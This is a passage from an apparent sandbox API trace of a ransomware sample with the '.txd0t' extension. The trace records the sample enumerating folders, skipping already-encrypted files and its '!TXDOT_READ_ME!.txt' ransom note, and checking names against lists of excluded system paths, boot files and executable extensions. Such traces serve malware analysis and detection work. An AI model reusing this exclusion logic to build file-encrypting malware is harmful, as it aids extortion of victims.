cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0128.833] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0128.833] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t" [0128.833] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.833] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.833] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58cbaaec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13b7e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.833] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.833] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.833] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0128.833] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0128.833] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.txd0t" [0128.833] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.833] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.833] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.833] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.833] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.833] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0128.833] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0128.833] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" [0128.833] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.833] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.833] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.833] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.833] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.833] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.833] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.834] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.834] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.834] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.834] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.834] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.834] GetProcessHeap () returned 0xe30000 [0128.834] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.834] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58dc5904, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58dc5904, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="3076", cAlternateFileName="")) returned 1 [0128.834] StrCmpW (psz1="3076", psz2=".") returned 1 [0128.834] StrCmpW (psz1="3076", psz2="..") returned 1 [0128.834] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.834] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.834] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="3076", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\system32\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\system\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\local\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\boot\\") returned 0x0 [0128.834] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\perflogs\\") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\programdata\\") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\drivers\\") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\wsus\\") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="crypt_detect") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="cryptolocker") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="ransomware") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\WINDOWS") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.835] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\Program Files") returned 0x0 [0128.835] GetProcessHeap () returned 0xe30000 [0128.835] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.835] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0128.835] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\*") returned="C:\\588bce7c90097ed212\\3076\\*" [0128.835] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58dc5904, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58dc5904, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.835] StrCmpW (psz1=".", psz2=".") returned 0 [0128.835] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58dc5904, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58dc5904, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.835] StrCmpW (psz1="..", psz2=".") returned 1 [0128.835] StrCmpW (psz1="..", psz2="..") returned 0 [0128.835] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58d2d05e, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58d2d05e, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d9f6dc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.835] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.835] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.835] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0128.835] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0128.835] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\3076\\!TXDOT_READ_ME!.txt" [0128.835] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.835] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.835] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.835] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.835] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.835] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.836] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.836] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58d2d05e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1aa5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.836] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.836] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.836] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0128.836] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0128.836] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t" [0128.836] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.836] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.836] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58d9f6dc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xef90, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.836] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.836] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.836] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0128.836] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0128.836] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.txd0t" [0128.836] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.836] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.836] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.836] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.836] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.836] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0128.836] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0128.836] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" [0128.836] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.836] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.836] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.837] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.837] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.837] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.837] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.837] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.837] GetProcessHeap () returned 0xe30000 [0128.837] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.837] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58e37f09, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0128.837] StrCmpW (psz1="3082", psz2=".") returned 1 [0128.837] StrCmpW (psz1="3082", psz2="..") returned 1 [0128.837] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.837] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.837] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="3082", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0128.837] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\system32\\") returned 0x0 [0128.837] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.837] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\system\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\local\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\boot\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\perflogs\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\programdata\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\drivers\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\wsus\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="crypt_detect") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="cryptolocker") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="ransomware") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\WINDOWS") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.838] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\Program Files") returned 0x0 [0128.838] GetProcessHeap () returned 0xe30000 [0128.838] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.838] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0128.838] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\*") returned="C:\\588bce7c90097ed212\\3082\\*" [0128.838] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58e37f09, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.838] StrCmpW (psz1=".", psz2=".") returned 0 [0128.838] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58e37f09, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, 